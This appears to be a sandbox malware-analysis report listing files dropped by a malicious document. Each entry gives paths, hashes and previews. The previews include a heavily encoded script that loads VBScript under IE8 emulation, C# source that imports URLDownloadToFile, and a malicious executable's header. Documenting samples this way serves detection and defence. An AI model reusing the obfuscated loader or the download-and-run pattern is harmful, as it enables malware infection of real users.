                                                                                  SHA-512:3BD83E7455E89ACF31C466C1410A5227B5933FC759E678BD464D602F13322D1D669D4FC14417BC498CC4978AB4599A18D16EBC30BFB827C15C3C6574711AD08E
                                                                                  Malicious:true
                                                                                  Preview:<script>.. ..document.write(unescape("%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%253Cscript%2520language%253DJavaScript%253Em%253D%2527%25253C%252521DOCTYPE%252520html%25253E%25250A%25253Cmeta%252520http-equiv%25253D%252522X-UA-Compatible%252522%252520content%25253D%252522IE%25253DEmulateIE8%252522%252520%25253E%25250A%25253Chtml%25253E%25250A%25253Cbody%25253E%25250A%25253CsCriPT%252520tyPE%25253D%252522tExt/VBscriPt%252522%25253E%25250ADim%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2525

                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\dllhost[1].exe

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):1028673
                                                                                  Entropy (8bit):7.272168802632154
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:ffmMv6Ckr7Mny5QLKUqJTFVdHB61DDREb:f3v+7/5QLRGTF7E6b
                                                                                  MD5:7F0098DCC054A27F80296ADF300573EC
                                                                                  SHA1:94BD05A8F7B8B79750025D0E9B6407BEB2B85C89
                                                                                  SHA-256:468981A4E110BCA0FA99EB08C2FBDA0E1482CF8EF5FBB3ADCF82DB6609AEDE24
                                                                                  SHA-512:904ADFADE566E1404D1D07EC1EB6141E06ABDC0B74A803946294124F485F7260DE2CBDDE32F2ABAAA96C0C25F3B476D39887502D5F304B3BC346D314119B1D77
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-...i.i.i..9.k.`.:.w.`.,...`.+.P.N%.c.N%.H.i.d.`. ./.w.:.k.w.;.h.i.8.h.`.>.h.Richi.........................PE..L.....K..........#..................c....... ....@..........................P......5!........@.......@.....................<...T.................................................................................... ..@............................text............................... ..`.rdata..\.... ......................@..@.data............h..................@....rsrc................H..............@..@................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\15C11140.emf

                                                                                  Download File
                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                  Category:dropped
                                                                                  Size (bytes):5596528
                                                                                  Entropy (8bit):2.9627880151323387
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:Nft3bECFzKzjLBMc0GtIRabD8R1AZJBa5jB7gOaOGVIl00xh600msetQr00ujh60:N5ACi8BiJK+nIlDh6osetQrsjh60
                                                                                  MD5:C8FF65340D86E7546ED74F2AEA89FF70
                                                                                  SHA1:C3C02AC92015D94D4D68479DADB5CD110C6CF8C9
                                                                                  SHA-256:58B91D40032E4C9C693DDACBA27C24C875EBBF2F9F6C9FFA7A10991FC1049C4C
                                                                                  SHA-512:385060117D6AE29EAC9CD9B6F69E50DF6FD86A84095AA2FA4DC14F2F3AAA27E2A6FC8E6F0E03F4D53E3A5A1038EF639B53BD44188E943A830005176F201D5008
                                                                                  Malicious:false
                                                                                  Preview:....l...............;............H...@.. EMF....peU.........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................&...........................%...........................6...............%...........L...d...................................!...

                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CF73AEE2.emf

                                                                                  Download File
                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                  Category:dropped
                                                                                  Size (bytes):5596528
                                                                                  Entropy (8bit):2.9627880151323387
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:Nft3bECFzKzjLBMc0GtIRabD8R1AZJBa5jB7gOaOGVIl00xh600msetQr00ujh60:N5ACi8BiJK+nIlDh6osetQrsjh60
                                                                                  MD5:C8FF65340D86E7546ED74F2AEA89FF70
                                                                                  SHA1:C3C02AC92015D94D4D68479DADB5CD110C6CF8C9
                                                                                  SHA-256:58B91D40032E4C9C693DDACBA27C24C875EBBF2F9F6C9FFA7A10991FC1049C4C
                                                                                  SHA-512:385060117D6AE29EAC9CD9B6F69E50DF6FD86A84095AA2FA4DC14F2F3AAA27E2A6FC8E6F0E03F4D53E3A5A1038EF639B53BD44188E943A830005176F201D5008
                                                                                  Malicious:false
                                                                                  Preview:....l...............;............H...@.. EMF....peU.........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................&...........................%...........................6...............%...........L...d...................................!...

                                                                                  C:\Users\user\AppData\Local\Temp\2ufkmc2n.u5y.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:very short file (no magic)
                                                                                  Category:dropped
                                                                                  Size (bytes):1
                                                                                  Entropy (8bit):0.0
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:U:U
                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                  Malicious:false
                                                                                  Preview:1

                                                                                  C:\Users\user\AppData\Local\Temp\RES4348.tmp

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Mon Sep 30 08:12:29 2024, 1st section name ".debug$S"
                                                                                  Category:dropped
                                                                                  Size (bytes):1328
                                                                                  Entropy (8bit):3.9887223545889405
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:Hae9EurpmdHMwKdNWI+ycuZhNkKakSX7PNnqSqd:HrpmzKd41ulta3BqSK
                                                                                  MD5:BA353523AC7B8ABB90A82DB33E60B2DD
                                                                                  SHA1:7E525848BDA7C964EEDE4BEDDC35759377FB68DD
                                                                                  SHA-256:E56FFDC839B37234C73C639033D66F919E13ED54960E7D7ACEA1B7CE34116597
                                                                                  SHA-512:FA1BEADAF1384922F3012F25887FFD543A6097C25A01A41EA5DD991860B85A85864571E9811852D30A98ACE6A7649BA7A79F73C3E8E3F534434F0FCA0A07FD3B
                                                                                  Malicious:false
                                                                                  Preview:L...m].f.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\ngxpd0hb\CSCA3EB236CC00F4C599499BBB2E0A3996.TMP................<'.....:....z...........4.......C:\Users\user\AppData\Local\Temp\RES4348.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...n.g.x.p.d.0.h.b...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

                                                                                  C:\Users\user\AppData\Local\Temp\RES866F.tmp

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Mon Sep 30 08:12:46 2024, 1st section name ".debug$S"
                                                                                  Category:dropped
                                                                                  Size (bytes):1328
                                                                                  Entropy (8bit):3.9580752766664196
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:HuMe9EurodHdyWwKdNWI+ycuZhNdakSLPNnqSqd:OJrA9y1Kd41ulda3hqSK
                                                                                  MD5:93D09C0FA5B7E438654F289D742F0440
                                                                                  SHA1:7EC4C950805C832792DDF0F30C38E19E583A39B1
                                                                                  SHA-256:CE241E6038BCBE282CF8AEB6065E460DFB026B9CF2181CF92BCBE257082478BE
                                                                                  SHA-512:35EEAB450A212B413A32B4F7DACB98E6DB4E8F1EEAF94401C97DEDBE52317BC7D0FE482F6DB34CE0C02868DE86406127D098C8AECD0B14FCA0F34C079FF6FD45
                                                                                  Malicious:false
                                                                                  Preview:L...~].f.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\tnesdt30\CSC4AC68FDA20F44DF3BBC22D1FFF1AFB9.TMP................h~.~+o h.n..Q.A...........4.......C:\Users\user\AppData\Local\Temp\RES866F.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...t.n.e.s.d.t.3.0...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

                                                                                  C:\Users\user\AppData\Local\Temp\differences

                                                                                  Download File
                                                                                  Process:C:\Users\user\AppData\Roaming\dllhost.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):134144
                                                                                  Entropy (8bit):6.988036264865725
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:YiIkiAAjad+AGbtzUAg3A+O4zPAIUO+6OzjAl1SVRxrUeHrBijxMo99FiPNWMA4Y:Ydki/jaEA2tUAIA+O0PAvO+62jAlk9rM
                                                                                  MD5:17D5375B48A0E2B4B35031BBC00D51D2
                                                                                  SHA1:6A51FAB0AE9D0D8BFADB647A0361ED9BEE5CD7D5
                                                                                  SHA-256:C01BCE2DBAE1415DC50041258654C24DBBED0C28921B04EEFFE7B03955F13F0C
                                                                                  SHA-512:C14516EDF35DD7B727B4ABEF2537A36D4DBC35203C82908918F1336EC1EB22A3217F0E04C762806EDE6E32CF1FCBB6C8C530283A9C98E8877F2091C00B780A51
                                                                                  Malicious:false
                                                                                  Preview:~b.E092Q]29S..FT.XWXLC38tE392QY29SRRFTZXWXLC384E392QY29SRRFT.XWXB\.64.:...X~.r.:/'z(%7+1RU.&RW\>-.[6r 3:z19x..`.Y*W\.\T8.SRRFTZX..LC.97E...7Y29SRRFT.XUYGBc84.292EY29SRRX@XXWxLC3.6E39rQY.9SRPFT^XWXLC380E392QY293PRFVZXWXLC18t.39"QY"9SRRVTZHWXLC38$E392QY29SRR.GXX.XLC3.6E.)2QY29SRRFTZXWXLC384.19>QY29SRRFTZXWXLC384E392QY29SRRFTZXWXLC384E392QY29SRRFtZX_XLC384E392QQ.9S.RFTZXWXLC38.1VAFQY2..SRFtZXW.MC3:4E392QY29SRRFTzXW8b1@JWE39.AY29sPRFFZXW.MC384E392QY29S.RF.t*24# 388E392.[29QRRF^XXWXLC384E392Q.29.RRFTZXWXLC384E392E[29SRR.TZXUXIC..5Ec.2QZ29S.RFR.xVX.C384E392QY29SRRFTZXWXLC384E392QY29SRRFTZXWX.>.7...PA..29SRRFUX[S^DK384E392Q'29S.RFT.XWX{C38.E39_QY2.SRR8TZX)XLCW84EA92Q829S.RFT5XWX"C38JE39,Sq.9SXx`TXpvXLI3..6.92[.39SV!eTZR.ZLC7K.E33.RY2= wRF^.\WXH0.84O.<2Q].cSQ.PRZXL7uC324F.,4QY).uRPnnZX]Xfe3;.P592Js.9Q.[FT^r.+QC3>..398%P29Q.XFT^rIZd.38>o.G"QY6.Sxp8EZXSsLi.F&E3=.Qs.G@RRB.Zru&XC3<.E.'0.M29Wxp8AZXSsLi.F"E3=.Qs.GDRRB.ZrIZ.T380o5.PQ+q$S"Q).ZXQp.C32.%394Qs.9-rRFPX7.XLI..jE1.1PY89QQ/pTZ\U\1t380oe90*`2

                                                                                  C:\Users\user\AppData\Local\Temp\ibz3bu0a.pqq.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:very short file (no magic)
                                                                                  Category:dropped
                                                                                  Size (bytes):1
                                                                                  Entropy (8bit):0.0
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:U:U
                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                  Malicious:false
                                                                                  Preview:1

                                                                                  C:\Users\user\AppData\Local\Temp\ngxpd0hb\CSCA3EB236CC00F4C599499BBB2E0A3996.TMP

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                  File Type:MSVC .res
                                                                                  Category:dropped
                                                                                  Size (bytes):652
                                                                                  Entropy (8bit):3.0910838560074314
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryyKak7YnqqX7PN5Dlq5J:+RI+ycuZhNkKakSX7PNnqX
                                                                                  MD5:3C27190F86C6113AD9B59FADE37AF190
                                                                                  SHA1:2984583C1D8AEC850E54A53E750A57CC93BF3B17
                                                                                  SHA-256:1FB4C267D7F72CD269E1225CE6C84413DDEF4701592C2A46D0E1638783A566CF
                                                                                  SHA-512:28F97D82C371F10CFC05064F1D92C9ABA1755B5C0F87685C4191F1EA2C7A430118E3FD18D925658990F90DDEF77C537E1B333C6DDA869751F157B385AF966436
                                                                                  Malicious:false
                                                                                  Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...n.g.x.p.d.0.h.b...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...n.g.x.p.d.0.h.b...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                  C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.0.cs

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (357)
                                                                                  Category:dropped
                                                                                  Size (bytes):474
                                                                                  Entropy (8bit):3.7159173576816786
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:V/DsYLDS81zuLTo0o2mMmNJlQXReKJ8SRHy4HKEuibGMCcJxF/3Vy:V/DTLDfunPXfH2E9bGwJx9Vy
                                                                                  MD5:006D2BDBC05ADF8DD13C8C672F8D8BDF
                                                                                  SHA1:63A2F1D74D732F474251C0278F91DF47E3872CAF
                                                                                  SHA-256:979007D0B68B1E466E58DAEC48283B65D3778CFDAE6A40819309D85F0F624A96
                                                                                  SHA-512:762FEF864AD0FF9A168B6925934AF3B6B90B0C053DA6A62EFEC831AE9FD2FE54DE935851178EC658937B316C2218E79F2D2C49A0C5A84478CDD662C6D72B47EA
                                                                                  Malicious:false
                                                                                  Preview:.using System;.using System.Runtime.InteropServices;..namespace cIlafGiabvr.{. public class MP. {. [DllImport("UrLmon.dLl", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr ZUqx,string XetuSvEs,string Vel,uint ntE,IntPtr LkPdDP);.. }..}.

                                                                                  C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.cmdline

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):369
                                                                                  Entropy (8bit):5.269972955203054
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23f+zxs7+AEszIP23fz:p37Lvkmb6KzWWZEor
                                                                                  MD5:38BFE91C3A35E274CF5EA5D0124D8354
                                                                                  SHA1:DC762A70AE07C79ECE14BD945152EBF752A2090A
                                                                                  SHA-256:8FCE80F68AA4DEE64A0221379B19723064D4E47E0E0E0879A704E3046589EAC0
                                                                                  SHA-512:C1D77C049726D37474C427E12496F80C31FDE30A7025BF5FB56C89FFD91FC15675092CB8BE47FC843CE84260F47D6AE21639CBA7CC4E0B2DD7831F7809ABBFEF
                                                                                  Malicious:true
                                                                                  Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.0.cs"

                                                                                  C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.dll

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):3072
                                                                                  Entropy (8bit):2.8077706843199537
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:etGSVePBG5eM7p8s8Sgkaqzu1X9YYTDtkZfvHe6EqhkWI+ycuZhNkKakSX7PNnq:67sM+To6NYYTiJ/7EEH1ulta3Bq
                                                                                  MD5:B633DD8247F5204A815AB69853E0D228
                                                                                  SHA1:FF65FE2C8204CD57354BE68AE9A7B928F8D7F0BE
                                                                                  SHA-256:B66586DA6E2871A4905798690CC64614DC5EDB1051506C93A8DAB1BFD45158A4
                                                                                  SHA-512:264FD64FF130F27C8E9963ACD994D0DE9E0E739E351C54C284DA986A625CAA1806017B8AC36B53E1EFA67E56E205461BBF1E1F04EF3DE363D87488B5E9DF6137
                                                                                  Malicious:true
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...m].f...........!.................#... ...@....... ....................................@.................................X#..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................6./.....r.....r.......................................... =.....P ......O.........U.....Z.....c.....g.....k...O.....O...!.O.....O.......!.....*.......=.......................................&..........<Module>.ng

                                                                                  C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.out

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                                                  Category:modified
                                                                                  Size (bytes):866
                                                                                  Entropy (8bit):5.344702855498716
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:AId3ka6KznEoqKaMD5DqBVKVrdFAMBJTH:Akka60nEoqKdDcVKdBJj
                                                                                  MD5:6AA0D2E41E9DF7EF613D96D099DD066D
                                                                                  SHA1:4882956A1FC7FD16F2DAFF58E8B77537DAB043E8
                                                                                  SHA-256:6F0527A6233F2FCA96DA256F3C7D194C0AA35A9852A08407EB57BB40A0AACDE1
                                                                                  SHA-512:774B97F1E6A7D967F6D68F1A23A45FE849DE0107B66FC7B359530097FE95AB57514A06A32C4728F981CD39CB466B0F5675CEDD914A077F541DCB476811FCB0B4
                                                                                  Malicious:false
                                                                                  Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                  C:\Users\user\AppData\Local\Temp\qdk1rybx.30f.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:very short file (no magic)
                                                                                  Category:dropped
                                                                                  Size (bytes):1
                                                                                  Entropy (8bit):0.0
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:U:U
                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                  Malicious:false
                                                                                  Preview:1

                                                                                  C:\Users\user\AppData\Local\Temp\tnesdt30\CSC4AC68FDA20F44DF3BBC22D1FFF1AFB9.TMP

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                  File Type:MSVC .res
                                                                                  Category:dropped
                                                                                  Size (bytes):652
                                                                                  Entropy (8bit):3.0711149678359173
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryPak7YnqqLPN5Dlq5J:+RI+ycuZhNdakSLPNnqX
                                                                                  MD5:687EEB7E2B6F2068EC6ECDF0511A41C0
                                                                                  SHA1:F40544D304E7A477217FD2A5954301081FF1E0F0
                                                                                  SHA-256:305571E874FFDE06870884004624FE0CE5ABDDD896A0033A5CF6CA7A033A186F
                                                                                  SHA-512:C1BECFCC78390CE81AA1E8C20436D0A4AF5C453A031BB16F9116806F4E6CC1E3D76379E1E2F3852610DAC254F0E96148975E6F0D0BDAD580CF01D7EEB861EE19
                                                                                  Malicious:false
                                                                                  Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...t.n.e.s.d.t.3.0...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...t.n.e.s.d.t.3.0...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                  C:\Users\user\AppData\Local\Temp\tnesdt30\tnesdt30.0.cs

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (357)
                                                                                  Category:dropped
                                                                                  Size (bytes):474
                                                                                  Entropy (8bit):3.7159173576816786
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:V/DsYLDS81zuLTo0o2mMmNJlQXReKJ8SRHy4HKEuibGMCcJxF/3Vy:V/DTLDfunPXfH2E9bGwJx9Vy
                                                                                  MD5:006D2BDBC05ADF8DD13C8C672F8D8BDF
                                                                                  SHA1:63A2F1D74D732F474251C0278F91DF47E3872CAF
                                                                                  SHA-256:979007D0B68B1E466E58DAEC48283B65D3778CFDAE6A40819309D85F0F624A96
                                                                                  SHA-512:762FEF864AD0FF9A168B6925934AF3B6B90B0C053DA6A62EFEC831AE9FD2FE54DE935851178EC658937B316C2218E79F2D2C49A0C5A84478CDD662C6D72B47EA
                                                                                  Malicious:false
                                                                                  Preview:.using System;.using System.Runtime.InteropServices;..namespace cIlafGiabvr.{. public class MP. {. [DllImport("UrLmon.dLl", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr ZUqx,string XetuSvEs,string Vel,uint ntE,IntPtr LkPdDP);.. }..}.

                                                                                  C:\Users\user\AppData\Local\Temp\tnesdt30\tnesdt30.cmdline

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):369
                                                                                  Entropy (8bit):5.152306089846528
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23f2u0zxs7+AEszIP23f2c:p37Lvkmb6Kzp0WZEoz
                                                                                  MD5:956834CED347AB99A275D7E7E27B98A2
                                                                                  SHA1:1EEADC8697BFBD4F09F9E2332BD0730B713EEA32
                                                                                  SHA-256:B1CC7102985AF8A320B3D99D3F5923DE8F61BC1DAD34873FAAB1236AF860E01C
                                                                                  SHA-512:AADE9B4C0E915A36311AD323977F64D25F5BEE50F7F0F145A43A3E1F84154622C17098E96D53E7BE0D6C9D31F233E698FDDB80635ABE6C8E9ADFCC6D621DD3BB
                                                                                  Malicious:false
                                                                                  Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\tnesdt30\tnesdt30.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\tnesdt30\tnesdt30.0.cs"

                                                                                  C:\Users\user\AppData\Local\Temp\tnesdt30\tnesdt30.dll

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):3072
                                                                                  Entropy (8bit):2.798638603031456
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:etGSEPBG5eM7p8s8Sgkaqz3GX9YYTDtkZf7eDqhkWI+ycuZhNdakSLPNnq:6LsM+ToWNYYTiJ7aEH1ulda3hq
                                                                                  MD5:0375D4A6469870A6E6674CD1257F6CC3
                                                                                  SHA1:6F9B401DDA79AC811CCC1F34235618CBF2AEC2A6
                                                                                  SHA-256:61EE1AD4A9828BA5BC2F177BA049DABBCB6460C3A0AF3BA12CC22BFE8459E9E2
